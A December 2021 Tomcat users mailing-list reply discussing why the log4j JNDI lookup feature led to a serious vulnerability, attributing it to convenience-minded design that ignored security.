James,
On 12/13/21 19:24, James H. H. Lampert wrote:
I can *barely* wrap my mind around the idea of getting executable code
from an RMI server, but what legitimate purpose could be served by
allowing a *logger* to resolve executable code?
None. The designers of log4j probably were thinking "hey, users might
want to log their configuration(s) to the log file at some point, so
maybe we can do them a favor and make it really easy to do that using
${jndi:} directly in the log message." Never, of course, thinking about
the fact that JNDI lookups can be *far* more ... interesting than just
grabbing a string value from memory and tossing it into a log message.
This vulnerability comes from two sources:
1. An incredibly powerful and complex infrastructure in JNDI
+
2. An incredibly simply way to access it (via log4j)
At the time, nobody was thinking critically about security because "it's
just logging stuff."
-chris
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
